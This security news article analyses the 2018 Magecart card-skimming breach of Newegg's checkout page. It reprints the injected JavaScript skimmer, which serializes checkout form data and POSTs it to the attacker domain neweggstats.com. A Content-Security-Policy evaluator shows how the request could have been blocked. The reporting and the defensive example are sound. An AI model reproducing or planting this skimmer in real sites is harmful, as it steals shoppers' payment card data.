The hackers who planted malicious code onto the British Airways payment pages were siphoning off Newegg payment data for a week before the BA hack had even started. Worryingly, even when British Airways went public with their data breach, it took another two weeks for Newegg to examine their own codebase. In total, the financial data stealing code was in place for 33 days between 16th August and 18th September 2018.

Newegg made a public announcement on Twitter:

Malicious Code

The fraudsters stealing the payment data, collectively known as Magecart, used code and techniques remarkably similar to those seen in the British Airways data breach; only 15 lines of beautified code were needed:

window.onload = function() {
    // Fire when the customer releases the "pay by credit card" button (mouse or touch)
    jQuery('#btnCreditCard.paymentBtn.creditcard').bind("mouseup touchend", function(e) {
        // Serialize every field of the checkout form, card details included
        var dat1 = jQuery('#checkout');
        var pdati = JSON.stringify(dat1.serializeArray());
        // Wait a quarter of a second, then POST the form data to the attacker's domain
        setTimeout(function() {
            jQuery.ajax({
                type: "POST",
                async: true,
                url: "https://neweggstats.com/GlobalData/",
                data: pdati,
                dataType: 'application/json'
            });
        }, 250);
    });
};

Although the JavaScript is fairly basic, its effect is clear: it captures the credit card details of any visitor unfortunate enough to have completed a purchase on the Newegg website during the one-month window.
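The skimmer depends on the browser being allowed to POST from the checkout page to an attacker-controlled host. The following is an added example, not code from the article or from Newegg: a simplified evaluator for the Content-Security-Policy `connect-src` directive, showing that a policy limiting XHR/fetch destinations to first-party hosts would have refused the POST to neweggstats.com. The page origin, the two policies and the checked URLs are constructed for the example.

```javascript
// Added example, not code from the article or from Newegg: a simplified
// evaluator for the CSP `connect-src` directive. Page origin, policies and
// URLs below are constructed for the example; path components are ignored
// when matching, as they are irrelevant to the host-level decision shown.

function parseConnectSrc(cspHeader) {
  // Return the source list of the connect-src directive, or null if absent.
  for (const directive of cspHeader.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens[0] && tokens[0].toLowerCase() === 'connect-src') return tokens.slice(1);
  }
  return null;
}

function sourceMatches(source, requestUrl, pageOrigin) {
  const req = new URL(requestUrl);
  const page = new URL(pageOrigin);
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return req.origin === page.origin;
  if (s === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return req.protocol === s; // scheme source, e.g. "https:"
  // Host source: [scheme://][*.]host[:port]
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:\/]+)(?::(\d+|\*))?/);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && req.protocol !== scheme + ':') return false;
  const hostOk = wildcard ? req.hostname.endsWith('.' + host) : req.hostname === host;
  if (!hostOk) return false;
  if (port && port !== '*') {
    const reqPort = req.port || (req.protocol === 'https:' ? '443' : '80');
    if (reqPort !== port) return false;
  }
  return true;
}

// Simplification: a missing connect-src is treated as unrestricted here (browsers fall back to default-src).
function connectAllowed(cspHeader, requestUrl, pageOrigin) {
  const sources = parseConnectSrc(cspHeader);
  if (sources === null) return true;
  return sources.some((src) => sourceMatches(src, requestUrl, pageOrigin));
}

const PAGE_ORIGIN = 'https://secure.newegg.com';          // checkout page origin (from the article)
const SKIMMER_URL = 'https://neweggstats.com/GlobalData/'; // exfiltration endpoint (from the article)
const WEAK_CSP = "default-src 'self'; connect-src *";                                 // constructed: any host allowed
const HARDENED_CSP = "default-src 'self'; connect-src 'self' https://*.newegg.com";   // constructed: first-party only

console.log(connectAllowed(WEAK_CSP, SKIMMER_URL, PAGE_ORIGIN));     // true: exfiltration permitted
console.log(connectAllowed(HARDENED_CSP, SKIMMER_URL, PAGE_ORIGIN)); // false: request refused
```

Script that runs inside the page can use any request type the policy leaves open, so `img-src`, `form-action` and `default-src` need the same first-party restriction for the policy to hold.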

Infrastructure

Strikingly, the attacks so far have been finely targeted: this breach sent data to the domain "neweggstats.com", which was registered only days before the theft of Newegg data began. A domain search on domai.nr shows a registration date of 13th August 2018.

Domain Name: NEWEGGSTATS.COM
Registry Domain ID: 2296932665_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2018-08-13T16:36:22Z
Creation Date: 2018-08-13T16:36:18Z
Registry Expiry Date: 2019-08-13T16:36:18Z

The domain was also secured with an SSL certificate from Comodo, so traffic between the browser and "neweggstats.com" was encrypted and looked more legitimate.

Avoiding Detection

The code injected into the Newegg website remained undetected because it was placed on a single, specific page, according to research from the security company Volexity:

Volexity was able to verify the presence of malicious JavaScript code limited to a page on secure.newegg.com presented during the checkout process at Newegg. The malicious code specifically appeared once when moving to the Billing Information page while checking out. This page, located at the URL https://secure.newegg.com/GlobalShopping/CheckoutStep2.aspx, would collect form data, siphoning it back to the attackers over SSL/TLS via the domain neweggstats.com.

Scale Of The Attack

Details are not clear right now on how many people will be affected by this data breach. However, Alexa ranks newegg.com as the 164th most popular website in the US, and Similar Web reports more than 50 million visitors per month.

Even with a relatively low conversion rate of 2%, that is over 1 million customers who could have had their financial data stolen over the one-month period.

Summary

The hacking group known as Magecart seems to be targeting specific, high-traffic websites to cause the maximum damage. Although it is not reasonable to expect the typical internet user to examine the HTTP requests made before and after a purchase on a website, everyone should be aware that attacks of this kind are possible, even on the biggest sites in the world.

Always check your bank statements and report suspicious activities to your banks and credit card companies.